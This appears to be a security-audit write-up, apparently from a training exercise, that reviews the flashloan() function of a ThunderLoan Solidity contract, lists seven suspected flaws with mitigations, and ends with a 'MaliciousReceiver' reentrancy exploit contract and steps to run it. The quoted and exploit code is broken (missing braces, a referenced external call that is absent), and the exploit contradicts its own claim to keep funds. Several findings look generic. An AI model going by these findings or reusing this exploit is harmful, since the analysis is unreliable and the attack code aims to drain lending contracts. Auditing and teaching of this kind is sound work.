1️⃣Initial Review


You can read about the scope details here.

  • Commit Hash: e8ce05f5530ca965165d41547b289604f873fdf6

  • In Scope:

├── interfaces
│   ├── IFlashLoanReceiver.sol
│   ├── IPoolFactory.sol
│   ├── ITSwapPool.sol
│   #── IThunderLoan.sol
├── protocol
│   ├── AssetToken.sol
│   ├── OracleUpgradeable.sol
│   #── ThunderLoan.sol
#── upgradedProtocol
    #── ThunderLoanUpgraded.sol

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Reviewing the flashloan() function

The flashloan() function can be found in the source file /src/protocol/ThunderLoan.sol

 function flashloan(address receiverAddress, IERC20 token, uint256 amount, bytes calldata params) external {
        AssetToken assetToken = s_tokenToAssetToken[token];
        uint256 startingBalance = IERC20(token).balanceOf(address(assetToken));

        if (amount > startingBalance) {
            revert ThunderLoan__NotEnoughTokenBalance(startingBalance, amount);

        if (!receiverAddress.isContract()) {
            revert ThunderLoan__CallerIsNotContract();

        uint256 fee = getCalculatedFee(token, amount);
        // slither-disable-next-line reentrancy-vulnerabilities-2 reentrancy-vulnerabilities-3

        emit FlashLoan(receiverAddress, token, amount, fee, params);

        s_currentlyFlashLoaning[token] = true;
        assetToken.transferUnderlyingTo(receiverAddress, amount);
        // slither-disable-next-line unused-return reentrancy-vulnerabilities-2

        uint256 endingBalance = token.balanceOf(address(assetToken));
        if (endingBalance < startingBalance + fee) {
                revert ThunderLoan__NotPaidBack(startingBalance + fee, endingBalance);
        s_currentlyFlashLoaning[token] = false;

This flashloan function contains several security issues, particularly related to reentrancy and the potential for underpayment of the loan. Let's break them down:

1. Reentrancy Vulnerability:

  • Problem: The function calls receiverAddress.functionCall() before verifying that the loan has been paid back with the fee. If the receiverAddress contract is malicious or vulnerable, it could re-enter the flashloan function (via some other code path) and perform another action before the current execution is completed. This can lead to a situation where the state is manipulated in an unexpected way, potentially allowing the receiverAddress to escape paying back the full amount.

  • Mitigation: To avoid reentrancy, you should update the contract’s state to reflect that the flash loan has been completed before making any external calls. Moving the s_currentlyFlashLoaning[token] = false; statement to just after the loan execution or using a mutex-style lock to prevent reentrancy is advisable.

2. Lack of Checks After External Call:

  • Problem: After the external call to receiverAddress.functionCall(), the contract only checks the ending balance against the starting balance plus the fee. This check is performed after transferring the loan amount and making the external call, which could potentially be manipulated in some cases, especially if other operations are taking place concurrently.

  • Mitigation: You should ensure that the contract's state is securely updated before and after any external call. Rechecking balances after every state-changing operation can help mitigate some risks.

3. Slippage and Fee Manipulation:

  • Problem: The contract does not protect against slippage or manipulation of the fee by the updateExchangeRate(fee) function. If an attacker can manipulate the exchange rate or fee calculation, they could potentially pay back less than required.

  • Mitigation: Ensure that the fee is calculated in a secure and predictable manner, ideally resistant to external manipulation. Consider implementing checks that prevent fee manipulation.

4. Denial of Service (DoS) via Flash Loan Execution:

  • Problem: If the receiverAddress contract is not properly coded or intentionally malfunctions (e.g., reverts during functionCall), it could prevent the flash loan from being successfully executed and returned, potentially locking funds in the contract.

  • Mitigation: Implement fallback mechanisms or timeouts to handle such cases, ensuring that the contract does not get stuck in an unusable state.

5. Event Emission Before State Changes:

  • Problem: The event FlashLoan is emitted before the state change s_currentlyFlashLoaning[token] = true;. This could lead to discrepancies between the emitted event and the actual state of the contract if the transaction fails after the event is emitted but before the state change.

  • Mitigation: Emit events after making state changes to ensure that the event data reflects the true state of the contract.

6. Failure to Handle Edge Cases:

  • Problem: The function assumes that the receiverAddress contract will always return the funds along with the fee. However, if the executeOperation function fails, the contract does not seem to have a fallback mechanism to handle this scenario.

  • Mitigation: Implement additional checks and conditions to handle cases where the executeOperation fails or reverts, possibly involving a revert with a more descriptive error message or taking alternative actions.

7. Potential for Reentrancy in updateExchangeRate(fee):

  • Problem: If the updateExchangeRate function is vulnerable to reentrancy or relies on external inputs, it could be exploited by a malicious actor.

  • Mitigation: Carefully review and secure the updateExchangeRate function to ensure it is not vulnerable to manipulation or reentrancy attacks.


// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./FlashLoanContract.sol"; // Assume this is the contract containing the vulnerable flashloan function
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";

contract MaliciousReceiver {
    FlashLoanContract public flashLoanContract;
    IERC20 public token;
    address public owner;
    uint256 public reentrancyCounter;

    constructor(address _flashLoanContract, address _token) {
        flashLoanContract = FlashLoanContract(_flashLoanContract);
        token = IERC20(_token);
        owner = msg.sender;

    // This function will be called by the flashloan contract
    function executeOperation(
        address, // tokenAddress
        uint256 amount,
        uint256 fee,
        address initiator,
        bytes calldata params
    ) external {
        require(msg.sender == address(flashLoanContract), "Not flashloan contract");

        // Re-enter the flashloan function before the first one completes
        if (reentrancyCounter == 0) {
            reentrancyCounter += 1;
            // Attempt to take out another flash loan within the first loan
            flashLoanContract.flashloan(address(this), token, amount, params);

        // Repay the loan with the minimum required, but exploit the vulnerability to keep the funds
        uint256 totalRepayment = amount + fee;
        token.transfer(address(flashLoanContract), totalRepayment);

        // Optionally, you could revert here to cause a DoS attack on the contract
        // require(false, "Reentrancy attack!");

    // Function to start the attack
    function startAttack(uint256 amount, bytes calldata params) external {
        require(msg.sender == owner, "Not owner");
        flashLoanContract.flashloan(address(this), token, amount, params);

    // Fallback function to receive Ether (if needed)
    receive() external payable {}

Steps to Execute

  • Deploy the MaliciousReceiver Contract:

    • Deploy the MaliciousReceiver contract, passing the address of the vulnerable flash loan contract and the ERC20 token address as constructor parameters.

  • Call startAttack:

    • Call the startAttack function on the MaliciousReceiver contract, specifying the amount of tokens to borrow and any necessary parameters.

  • Exploit the Reentrancy:

    • During the execution of executeOperation, the MaliciousReceiver contract re-enters the flashloan function before the original loan is settled. This can lead to unexpected behavior, such as draining funds, executing multiple loans, or causing other state manipulation.

Last updated

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